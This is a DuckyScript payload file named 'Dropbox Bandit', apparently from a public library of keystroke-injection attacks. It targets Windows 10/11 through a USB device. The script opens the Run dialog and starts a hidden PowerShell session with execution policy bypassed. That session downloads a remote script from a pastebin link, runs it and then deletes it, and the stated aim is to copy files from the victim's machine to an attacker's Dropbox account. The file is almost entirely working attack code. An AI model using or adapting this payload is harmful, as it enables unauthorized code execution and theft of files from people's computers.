Path: blob/master/payloads/library/exfiltration/Dropbox-Bandit/payload_duckyscript_old.txt
REM Title: Dropbox Bandit
REM Author: Factor (github.com/Factor101)
REM Description: Extracts files from a specific location on a target's machine and uploads them to a Dropbox account
REM Target: Windows 10/11 (PowerShell)
REM Version: 1.0
REM Category: Exfiltration

REM Initial Delay
DELAY 500

REM Open the Run dialog
GUI r
REM Delay to allow window to open
DELAY 100
REM Launch hidden powershell window to execute our script

REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here
REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0
REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>
REM --------- replace me! ----------
STRING powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"
DELAY 200
ENTER

REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky
CAPSLOCK